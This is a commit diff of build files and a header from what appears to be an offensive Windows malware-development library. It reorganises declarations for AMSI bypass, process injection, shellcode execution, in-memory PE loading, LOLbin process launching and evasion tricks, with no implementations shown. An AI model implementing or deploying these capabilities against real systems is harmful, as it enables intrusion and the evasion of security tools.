<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp" />
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp" />
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp" />
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp" />
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp" />
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp" />
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
<ClCompile Include="CreateProcessWithCfGuard.cpp" />
<ClCompile Include="CreatePseudoRandomInteger.cpp" />
@ -172,17 +176,21 @@
<ClCompile Include="CreateThreadAndWaitForCompletion.cpp" />
<ClCompile Include="CreateWindowsObjectPath.cpp" />
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp" />
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp" />
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp" />
<ClCompile Include="DnsGetDomainNameIPv4AddressAsString.cpp" />
<ClCompile Include="DnsGetDomainNameIPv4AddressUnsignedLong.cpp" />
<ClCompile Include="ExampleOfUsageOfHardwareBreakpointHookingEngine.cpp" />
<ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp" />
<ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
<ClCompile Include="GetCurrentProcessNoForward.cpp" />
<ClCompile Include="GetCurrentThreadNoForward.cpp" />
<ClCompile Include="GetPeSectionSizeInBytes.cpp" />
<ClCompile Include="IeCreateFile.cpp" />
<ClCompile Include="IsPeSection.cpp" />
<ClCompile Include="IsProcessRunningAsAdmin2.cpp" />
<ClCompile Include="LzMaximumCompressBuffer.cpp" />
<ClCompile Include="LzMaximumDecompressBuffer.cpp" />
<ClCompile Include="LzStandardCompressBuffer.cpp" />
@ -259,7 +267,6 @@
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
<ClCompile Include="MemoryFindMemory.cpp" />
<ClCompile Include="MpfExtractMaliciousPayloadFromZipFileNoPassword.cpp" />
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
<ClCompile Include="Main.cpp" />
<ClCompile Include="ManualResourceDataFetching.cpp" />
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
@ -322,6 +329,8 @@
<ClCompile Include="ReadDataFromPeSection.cpp" />
<ClCompile Include="RemoveDescriptorEntry.cpp" />
<ClCompile Include="RemoveRegisterDllNotification.cpp" />
<ClCompile Include="RtlInitAnsiString.cpp" />
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp" />
<ClCompile Include="SetHardwareBreakpoint.cpp" />
<ClCompile Include="ShutdownHardwareBreakpointEngine.cpp" />
<ClCompile Include="SleepObfuscationViaVirtualProtect.cpp" />
@ -375,6 +384,9 @@
<ItemGroup>
<None Include="..\README.md" />
</ItemGroup>
<ItemGroup>
<Text Include="Notes.txt" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>

163
VX-API/VX-API.vcxproj.filters
View File

@ -58,9 +58,6 @@
<Filter Include="Source Files\Windows API Helper Functions\Network Connectivity\Network Data Conversions">
<UniqueIdentifier>{6be9adc7-8493-44a7-abce-3ec818469f70}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins">
<UniqueIdentifier>{b688b3fc-f662-4634-b690-f200a79aee37}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Rad Hardware Breakpoint Hooking Engine">
<UniqueIdentifier>{148b86cd-abe4-43c3-a827-d89b58910722}</UniqueIdentifier>
</Filter>
@ -91,6 +88,12 @@
<Filter Include="Source Files\Windows API Helper Functions\Cryptography Related\Compression\Xpress Huff">
<UniqueIdentifier>{28a8f2b1-755e-465f-b650-13a6f1c191c3}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\Process Creation">
<UniqueIdentifier>{97f12dfe-6de4-480c-834c-ea10483eea2d}</UniqueIdentifier>
</Filter>
<Filter Include="Source Files\Windows API Helper Functions\File Handling">
<UniqueIdentifier>{b1bb1e2e-db48-4d6e-91a7-213c6e47a46a}</UniqueIdentifier>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Main.cpp">
@ -99,9 +102,6 @@
<ClCompile Include="StringCopy.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
<ClCompile Include="CaplockString.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
<ClCompile Include="CopyMemoryEx.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
@ -249,9 +249,6 @@
<ClCompile Include="CreateWindowsObjectPath.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="GetCurrentDirectoryFromUserProcessParameters.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
@ -306,15 +303,6 @@
<ClCompile Include="MpfComModifyShortcutTarget.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="CreateProcessWithCfGuard.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="HashFileByMsiFileHashTable.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
@ -339,24 +327,12 @@
<ClCompile Include="IsDebuggerPresentEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Antidebug</Filter>
</ClCompile>
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="DelayedExecutionExecuteOnDisplayOff.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateMd5HashFromFilePath.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="GetOsMajorVersionFromPeb.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
@ -423,9 +399,6 @@
<ClCompile Include="ShlwapiWCharStringToCharString.cpp">
<Filter>Source Files\String Manipulation\String Conversion</Filter>
</ClCompile>
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
</ClCompile>
<ClCompile Include="ManualResourceDataFetching.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
@ -468,12 +441,6 @@
<ClCompile Include="IsRegistryKeyValid.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Lolbins</Filter>
</ClCompile>
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="HashStringMurmur.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related\String Hashing</Filter>
</ClCompile>
@ -540,12 +507,6 @@
<ClCompile Include="CreatePseudoRandomIntegerFromNtdll.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
</ClCompile>
@ -762,38 +723,107 @@
<ClCompile Include="MpfSceViaSymEnumSourceFiles.cpp">
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution</Filter>
</ClCompile>
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="GetCurrentProcessNoForward.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="GetCurrentThreadNoForward.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessFromUrlOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessWithCfGuard.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromZipfldrRouteCall.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShell32ShellExecRun.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromUrlFileProtocolHandler.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromPcwUtil.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateProcessByWindowsRHotKey.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="CreateFileFromDsCopyFromSharedFile.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="CopyFileViaSetupCopyFile.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp">
<Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
</ClCompile>
<ClCompile Include="DeleteFileWithCreateFileFlag.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="MpfExecutePeBinaryInMemoryFromByteArray.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="DeleteDirectoryAndSubDataViaDelNode.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="IsProcessRunningAsAdmin2.cpp">
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
</ClCompile>
<ClCompile Include="ExtractFilesFromCabIntoTarget.cpp">
<Filter>Source Files\Windows API Helper Functions\Cryptography Related</Filter>
</ClCompile>
<ClCompile Include="IeCreateFile.cpp">
<Filter>Source Files\Windows API Helper Functions\File Handling</Filter>
</ClCompile>
<ClCompile Include="CaplockString.cpp">
<Filter>Source Files\String Manipulation</Filter>
</ClCompile>
<ClCompile Include="RtlInitAnsiString.cpp">
<Filter>Source Files\String Manipulation\Windows Unicode Structure</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromMSHTML.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
<ClCompile Include="RtlSetBaseUnicodeCommandLine.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
</ClCompile>
<ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp">
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
<ClCompile Include="CreateProcessFromWmiWin32_Process.cpp">
<Filter>Source Files\Windows API Helper Functions\Process Creation</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
@ -813,4 +843,7 @@
<ItemGroup>
<None Include="..\README.md" />
</ItemGroup>
<ItemGroup>
<Text Include="Notes.txt" />
</ItemGroup>
</Project>

5
VX-API/VX-API.vcxproj.user
View File

@ -1,4 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>javascript:alert('hello');</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>

63
VX-API/Win32Helper.h
View File

@ -22,9 +22,9 @@
#include <resapi.h>
#include <amsi.h>
#include <SetupAPI.h>
#include <WbemCli.h>
#pragma comment(lib, "wbemuuid.lib")
#pragma comment(lib, "Dnsapi.lib")
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib, "Crypt32.lib")
@ -272,8 +272,6 @@ DWORD MpfComMonitorChromeSessionOnce(VOID);
DWORD MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc(_In_ PBYTE BinaryImage);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR ExtensionIdentifier);
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordW(_In_ PWCHAR FullPathToZip, _In_ PWCHAR FullPathToExtractionDirectory);
BOOL MpfExtractMaliciousPayloadFromZipFileNoPasswordA(_In_ PCHAR FullPathToZip, _In_ PCHAR FullPathToExtractionDirectory);
@ -330,35 +328,35 @@ BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInByt
/*******************************************
EVASION
*******************************************/
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
BOOL MasqueradePebAsExplorer(VOID);
BOOL CreateFileFromDsCopyFromSharedFileW(_In_ PWCHAR NewFileName, _In_ PWCHAR FileToClone);
BOOL CreateFileFromDsCopyFromSharedFileA(_In_ PCHAR NewFileName, _In_ PCHAR FileToClone);
BOOL DelayedExecutionExecuteOnDisplayOff(VOID);
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
BOOL RemoveDllFromPebA(_In_ LPCSTR lpModuleName);
BOOL RemoveDllFromPebW(_In_ LPCWSTR lpModuleName);
BOOL HookEngineUnhookHeapFree(_In_ BOOL StartEngine);
BOOL HookEngineRestoreHeapFree(_In_ BOOL ShutdownEngine);
BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In_ PUCHAR Key);
BOOL RemoveRegisterDllNotification(VOID);
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
BOOL CreateProcessWithCfGuardA(_Inout_ PPROCESS_INFORMATION Pi, _In_ PCHAR Path);
HRESULT CreateProcessFromIHxInteractiveUserW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxInteractiveUserA(_In_ PCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerW(_In_ PWCHAR UriFile);
HRESULT CreateProcessFromIHxHelpPaneServerA(_In_ PCHAR UriFile);
DWORD CreateProcessFromShellExecuteInExplorerProcessW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromShellExecuteInExplorerProcessA(_In_ PCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeW(_In_ PWCHAR BinaryPath);
DWORD CreateProcessFromIShellDispatchInvokeA(_In_ PCHAR BinaryPath);
DWORD CreateProcessViaNtCreateUserProcessW(PWCHAR FullBinaryPath);
DWORD CreateProcessViaNtCreateUserProcessA(PCHAR FullBinaryPath);
DWORD CreateProcessByWindowsRHotKeyW(_In_ PWCHAR FullPathToBinary);
DWORD CreateProcessByWindowsRHotKeyA(_In_ PCHAR FullPathToBinary);
DWORD CreateProcessByWindowsRHotKeyExW(_In_ PWCHAR FullPathToBinary);
DWORD CreateProcessByWindowsRHotKeyExA(_In_ PCHAR FullPathToBinary);
BOOL AmsiBypassViaPatternScan(DWORD ProcessId);
BOOL CopyFileViaSetupCopyFileW(LPCWSTR Source, LPCWSTR Destination);
BOOL CopyFileViaSetupCopyFileA(LPCSTR Source, LPCSTR Destination);
BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
@ -369,12 +367,18 @@ BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCST
BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection); // <--- not implemented
BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection); // <--- not implemented
BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile);
BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile);
BOOL CreateProcessFromShell32ShellExecRunW(LPCWSTR PathToFile);
BOOL CreateProcessFromShell32ShellExecRunA(LPCSTR PathToFile);
BOOL CreateProcessFromUrlOpenUrlW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromUrlOpenUrlA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromUrlFileProtocolHandlerW(LPCWSTR PathToUrlFile);
BOOL CreateProcessFromUrlFileProtocolHandlerA(LPCSTR PathToUrlFile);
BOOL CreateProcessFromZipfldrRouteCallW(LPCWSTR PathToFile);
BOOL CreateProcessFromZipfldrRouteCallA(LPCSTR PathToFile);
BOOL CreateProcessFromMsHTMLW(LPCWSTR MshtaCommand);
@ -435,3 +439,16 @@ INT __demonstration_WinMain(VOID); //hook sleep
PCHAR GenericShellcodeHelloWorldMessageBoxA(_Out_ PDWORD SizeOfShellcodeInBytes);
PCHAR GenericShellcodeOpenCalcExitThread(_Out_ PDWORD SizeOfShellcodeInBytes);
PCHAR GenericShellcodeHelloWorldMessageBoxAEbFbLoop(_Out_ PDWORD SizeOfShellcodeInBytes);
BOOL DeleteDirectoryAndSubDataViaDelNodeW(LPCWSTR FullPathToDirectory);
BOOL DeleteDirectoryAndSubDataViaDelNodeA(LPCSTR FullPathToDirectory);
BOOL IsProcessRunningAsAdmin2(VOID);
BOOL ExtractFilesFromCabIntoTargetW(LPCWSTR CabFile, LPCWSTR OutputDirectory);
BOOL ExtractFilesFromCabIntoTargetA(LPCSTR CabFile, LPCSTR OutputDirectory);
HANDLE IeCreateFileW(LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
HANDLE IeCreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile);
BOOL RtlSetBaseUnicodeCommandLine(PWCHAR CommandLinePayload);
DWORD CreateProcessFromWmiWin32_ProcessW(LPCWSTR BinaryPath);